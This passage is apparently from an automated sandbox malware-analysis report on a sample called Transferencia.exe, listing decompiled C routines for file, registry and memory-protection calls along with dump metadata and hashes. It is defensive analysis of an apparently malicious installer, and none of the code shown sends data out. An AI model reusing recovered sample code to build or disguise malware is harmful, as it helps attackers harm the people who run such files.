                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                • String ID:
                                                • API String ID: 2547128583-0
                                                • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                • Instruction ID: 6423a29397ed7bff7b22ace80297d9bc35d616ea5f013efbaa2f78a15a639a79
                                                • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                • Instruction Fuzzy Hash: CEE08673504210AAE21196716E44C7773A89F89740316443FF946F2080D738DC359AAD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 68%
                                                			E0040600A(WCHAR* _a4, long _a8, long _a12) {
                                                				signed int _t5;
                                                				void* _t6;
                                                
                                                				_t5 = GetFileAttributesW(_a4); // executed
                                                				asm("sbb ecx, ecx");
                                                				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                				return _t6;
                                                			}





                                                0x0040600e
                                                0x0040601b
                                                0x00406030
                                                0x00406036

                                                APIs
                                                • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\Transferencia.exe,80000000,00000003,?,?,?,?,?,0040385A,?), ref: 0040600E
                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040385A,?), ref: 00406030
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405FE5(WCHAR* _a4) {
                                                				signed char _t3;
                                                				signed char _t7;
                                                
                                                				_t3 = GetFileAttributesW(_a4); // executed
                                                				_t7 = _t3;
                                                				if(_t7 != 0xffffffff) {
                                                					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                                                				}
                                                				return _t7;
                                                			}





                                                0x00405fea
                                                0x00405ff0
                                                0x00405ff5
                                                0x00405ffe
                                                0x00405ffe
                                                0x00406007

                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,?,00405BEA,?,?,00000000,00405DC0,?,?,?,?), ref: 00405FEA
                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405FFE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                • Instruction ID: e4d3e829c0d5e7da9196b8d45c2199d6a51b20c6ab53065100e3d1aec4738abc
                                                • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                • Instruction Fuzzy Hash: 4CD01272504130BFC2102728EF0C89BBF95EF64375B024B35FAA5A22F0CB304C638A98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405AC8(WCHAR* _a4) {
                                                				int _t2;
                                                
                                                				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                				if(_t2 == 0) {
                                                					return GetLastError();
                                                				}
                                                				return 0;
                                                			}




                                                0x00405ace
                                                0x00405ad6
                                                0x00000000
                                                0x00405adc
                                                0x00000000

                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,00000000,004034FD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405ACE
                                                • GetLastError.KERNEL32 ref: 00405ADC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: CreateDirectoryErrorLast
                                                • String ID:
                                                • API String ID: 1375471231-0
                                                • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                • Instruction ID: 96bb703f3db892353912e36940962cdd7e9d34b0f70b6f3c067145efd4a10b7e
                                                • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                • Instruction Fuzzy Hash: 95C04C30344601AEDA105B219E48B1B7AD4DB50741F26853D6146F41A0EA788455DD3D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 28%
                                                			E732A2B98(void* __ecx, intOrPtr _a4) {
                                                				signed int _v8;
                                                				void* _t28;
                                                				void* _t29;
                                                				int _t33;
                                                				void* _t37;
                                                				void* _t40;
                                                				void* _t45;
                                                				void* _t49;
                                                				signed int _t56;
                                                				void* _t61;
                                                				void* _t70;
                                                				intOrPtr _t72;
                                                				signed int _t77;
                                                				intOrPtr _t79;
                                                				intOrPtr _t80;
                                                				void* _t81;
                                                				void* _t87;
                                                				void* _t88;
                                                				void* _t89;
                                                				void* _t90;
                                                				intOrPtr _t93;
                                                				intOrPtr _t94;
                                                
                                                				if( *0x732a5050 != 0 && E732A2ADB(_a4) == 0) {
                                                					 *0x732a5054 = _t93;
                                                					if( *0x732a504c != 0) {
                                                						_t93 =  *0x732a504c;
                                                					} else {
                                                						E732A30C0(E732A2AD5(), __ecx);
                                                						 *0x732a504c = _t93;
                                                					}
                                                				}
                                                				_t28 = E732A2B09(_a4);
                                                				_t94 = _t93 + 4;
                                                				if(_t28 <= 0) {
                                                					L9:
                                                					_t29 = E732A2AFD();
                                                					_t72 = _a4;
                                                					_t79 =  *0x732a5058;
                                                					 *((intOrPtr*)(_t29 + _t72)) = _t79;
                                                					 *0x732a5058 = _t72;
                                                					E732A2AF7();
                                                					_t33 = ReadFile(??, ??, ??, ??, ??); // executed
                                                					 *0x732a5034 = _t33;
                                                					 *0x732a5038 = _t79;
                                                					if( *0x732a5050 != 0 && E732A2ADB( *0x732a5058) == 0) {
                                                						 *0x732a504c = _t94;
                                                						_t94 =  *0x732a5054;
                                                					}
                                                					_t80 =  *0x732a5058;
                                                					_a4 = _t80;
                                                					 *0x732a5058 =  *((intOrPtr*)(E732A2AFD() + _t80));
                                                					_t37 = E732A2AE9(_t80);
                                                					_pop(_t81);
                                                					if(_t37 != 0) {
                                                						_t40 = E732A2B09(_t81);
                                                						if(_t40 > 0) {
                                                							_push(_t40);
                                                							_push(E732A2B14() + _a4 + _v8);
                                                							_push(E732A2B1E());
                                                							if( *0x732a5050 <= 0 || E732A2ADB(_a4) != 0) {
                                                								_pop(_t88);
                                                								_pop(_t45);
                                                								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
                                                								if(__eflags == 0) {
                                                								}
                                                								asm("loop 0xfffffff5");
                                                							} else {
                                                								_pop(_t89);
                                                								_pop(_t49);
                                                								 *0x732a504c =  *0x732a504c +  *(_t89 + _t49) * 4;
                                                								asm("loop 0xffffffeb");
                                                							}
                                                						}
                                                					}
                                                					_t107 =  *0x732a5058;
                                                					if( *0x732a5058 == 0) {
                                                						 *0x732a504c = 0;
                                                					}
                                                					E732A2B42(_t107, _a4,  *0x732a5034,  *0x732a5038);
                                                					return _a4;
                                                				}
                                                				_push(E732A2B14() + _a4);
                                                				_t56 = E732A2B1A();
                                                				_v8 = _t56;
                                                				_t77 = _t28;
                                                				_push(_t68 + _t56 * _t77);
                                                				_t70 = E732A2B26();
                                                				_t87 = E732A2B22();
                                                				_t90 = E732A2B1E();
                                                				_t61 = _t77;
                                                				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
                                                					_push( *((intOrPtr*)(_t70 + _t61)));
                                                				}
                                                				_push( *((intOrPtr*)(_t87 + _t61)));
                                                				asm("loop 0xfffffff1");
                                                				goto L9;
                                                			}

























                                                0x732a2ba8
                                                0x732a2bb9
                                                0x732a2bc6
                                                0x732a2bda
                                                0x732a2bc8
                                                0x732a2bcd
                                                0x732a2bd2
                                                0x732a2bd2
                                                0x732a2bc6
                                                0x732a2be3
                                                0x732a2be8
                                                0x732a2bee
                                                0x732a2c32
                                                0x732a2c32
                                                0x732a2c37
                                                0x732a2c3c
                                                0x732a2c42
                                                0x732a2c44
                                                0x732a2c4a
                                                0x732a2c57
                                                0x732a2c59
                                                0x732a2c5e
                                                0x732a2c6b
                                                0x732a2c7e
                                                0x732a2c84
                                                0x732a2c8a
                                                0x732a2c8b
                                                0x732a2c91
                                                0x732a2c9d
                                                0x732a2ca3
                                                0x732a2cab
                                                0x732a2cac
                                                0x732a2caf
                                                0x732a2cba
                                                0x732a2cbc
                                                0x732a2cc8
                                                0x732a2cce
                                                0x732a2cd6
                                                0x732a2d02
                                                0x732a2d03
                                                0x732a2d05
                                                0x732a2d09
                                                0x732a2d09
                                                0x732a2d10
                                                0x732a2ce6
                                                0x732a2ce6
                                                0x732a2ce7
                                                0x732a2cf5
                                                0x732a2cfe
                                                0x732a2cfe
                                                0x732a2cd6
                                                0x732a2cba
                                                0x732a2d12
                                                0x732a2d19
                                                0x732a2d1b
                                                0x732a2d1b
                                                0x732a2d34
                                                0x732a2d42
                                                0x732a2d42
                                                0x732a2bf9
                                                0x732a2bfa
                                                0x732a2bff
                                                0x732a2c03
                                                0x732a2c08
                                                0x732a2c1c
                                                0x732a2c1d
                                                0x732a2c1e
                                                0x732a2c20
                                                0x732a2c25
                                                0x732a2c27
                                                0x732a2c27
                                                0x732a2c2a
                                                0x732a2c30
                                                0x00000000

                                                APIs
                                                • ReadFile.KERNELBASE(00000000), ref: 732A2C57
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.756317960.00000000732A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 732A0000, based on PE: true
                                                • Associated: 00000000.00000002.756311352.00000000732A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.756329828.00000000732A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.756338430.00000000732A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_732a0000_Transferencia.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: c20f5053eb2bc463d40a08126a21abfcc9030f75c2cc04265b23dd5b9f9a9867
                                                • Instruction ID: 728647bf0c09a74b9912f5dcd9889500b1b8fbffccdebe6de0ee69a9c2250274
                                                • Opcode Fuzzy Hash: c20f5053eb2bc463d40a08126a21abfcc9030f75c2cc04265b23dd5b9f9a9867
                                                • Instruction Fuzzy Hash: DC418DB2504309EFEB11AF69D988B5A77B9EB48310F30C826EC49E6141D67994C4FB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004023B2(int __eax, WCHAR* __ebx) {
                                                				WCHAR* _t11;
                                                				WCHAR* _t13;
                                                				void* _t17;
                                                				int _t21;
                                                
                                                				_t11 = __ebx;
                                                				_t5 = __eax;
                                                				_t13 = 0;
                                                				if(__eax != __ebx) {
                                                					__eax = E00402DA6(__ebx);
                                                				}
                                                				if( *((intOrPtr*)(_t17 - 0x2c)) != _t11) {
                                                					_t13 = E00402DA6(0x11);
                                                				}
                                                				if( *((intOrPtr*)(_t17 - 0x20)) != _t11) {
                                                					_t11 = E00402DA6(0x22);
                                                				}
                                                				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402DA6(0xffffffcd)); // executed
                                                				_t21 = _t5;
                                                				if(_t21 == 0) {
                                                					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                				}
                                                				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t17 - 4));
                                                				return 0;
                                                			}







                                                0x004023b2
                                                0x004023b2
                                                0x004023b4
                                                0x004023b8
                                                0x004023bb
                                                0x004023c0
                                                0x004023c5
                                                0x004023ce
                                                0x004023ce
                                                0x004023d3
                                                0x004023dc
                                                0x004023dc
                                                0x004023e9
                                                0x004015b4
                                                0x004015b6
                                                0x0040292e
                                                0x0040292e
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: PrivateProfileStringWrite
                                                • String ID:
                                                • API String ID: 390214022-0
                                                • Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                • Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
                                                • Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                • Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040608D(void* _a4, void* _a8, long _a12) {
                                                				int _t7;
                                                				long _t11;
                                                
                                                				_t11 = _a12;
                                                				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                				if(_t7 == 0 || _t11 != _a12) {
                                                					return 0;
                                                				} else {
                                                					return 1;
                                                				}
                                                			}





                                                0x00406091
                                                0x004060a1
                                                0x004060a9
                                                0x00000000
                                                0x004060b0
                                                0x00000000
                                                0x004060b2

                                                APIs
                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034BF,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060A1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                • Instruction ID: 9ce5220da9ed3c49ab8c05536da5923326b58a2142fda2ae973167115508ceb5
                                                • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                • Instruction Fuzzy Hash: 2DE08632140259ABCF119E518C00AEB376CFB05350F018472F911E2240D630E82187A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004060BC(void* _a4, void* _a8, long _a12) {
                                                				int _t7;
                                                				long _t11;
                                                
                                                				_t11 = _a12;
                                                				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                				if(_t7 == 0 || _t11 != _a12) {
                                                					return 0;
                                                				} else {
                                                					return 1;
                                                				}
                                                			}





                                                0x004060c0
                                                0x004060d0
                                                0x004060d8
                                                0x00000000
                                                0x004060df
                                                0x00000000
                                                0x004060e1

                                                APIs
                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403475,00000000,00793700,000000FF,00793700,000000FF,000000FF,00000004,00000000), ref: 004060D0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: FileWrite
                                                • String ID:
                                                • API String ID: 3934441357-0
                                                • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                • Instruction ID: ff7f98053b8daf8dc00d9e724bd7773b369301681fd057c4f0a19a08aea0fefc
                                                • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                • Instruction Fuzzy Hash: AEE0EC3225426AABDF10AF659C00AEB7BACFB15360F018437FA56E3190D631E83197A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                
                                                				 *0x732a5048 = _a4;
                                                				if(_a8 == 1) {
                                                					VirtualProtect(0x732a505c, 4, 0x40, 0x732a504c); // executed
                                                					 *0x732a505c = 0xc2;
                                                					 *0x732a504c = 0;
                                                					 *0x732a5054 = 0;
                                                					 *0x732a5068 = 0;
                                                					 *0x732a5058 = 0;
                                                					 *0x732a5050 = 0;
                                                					 *0x732a5060 = 0;
                                                					 *0x732a505e = 0;
                                                				}
                                                				return 1;
                                                			}



                                                0x732a2a88
                                                0x732a2a8d
                                                0x732a2a9d
                                                0x732a2aa5
                                                0x732a2aac
                                                0x732a2ab1
                                                0x732a2ab6
                                                0x732a2abb
                                                0x732a2ac0
                                                0x732a2ac5
                                                0x732a2aca
                                                0x732a2aca
                                                0x732a2ad2

                                                APIs
                                                • VirtualProtect.KERNELBASE(732A505C,00000004,00000040,732A504C), ref: 732A2A9D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.756317960.00000000732A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 732A0000, based on PE: true
                                                • Associated: 00000000.00000002.756311352.00000000732A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.756329828.00000000732A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.756338430.00000000732A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_732a0000_Transferencia.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: f388b27ae6b77a6d037abefca9117611716b68adb514808f8b5aa1478913797a
                                                • Instruction ID: f7a2c913a0801d69f80a1fa79d884a2cf0adacc6f02f0b90e774a171a504f9c5
                                                • Opcode Fuzzy Hash: f388b27ae6b77a6d037abefca9117611716b68adb514808f8b5aa1478913797a
                                                • Instruction Fuzzy Hash: B4F07FF2544280EFC350EB2A844870B3BE0A70C308B35C56AA9DCD6642E3744084BB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00406387(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                				void* _t7;
                                                				long _t8;
                                                				void* _t9;
                                                
                                                				_t7 = E00406306(_a4,  &_a12);
                                                				if(_t7 != 0) {
                                                					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
                                                					return _t8;
                                                				}
                                                				_t9 = 6;
                                                				return _t9;
                                                			}






                                                0x00406391
                                                0x00406398
                                                0x004063ab
                                                0x00000000
                                                0x004063ab
                                                0x0040639c
                                                0x00000000

                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,007A0F28,?,?,00406415,007A0F28,00000000,?,?,Call,?), ref: 004063AB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
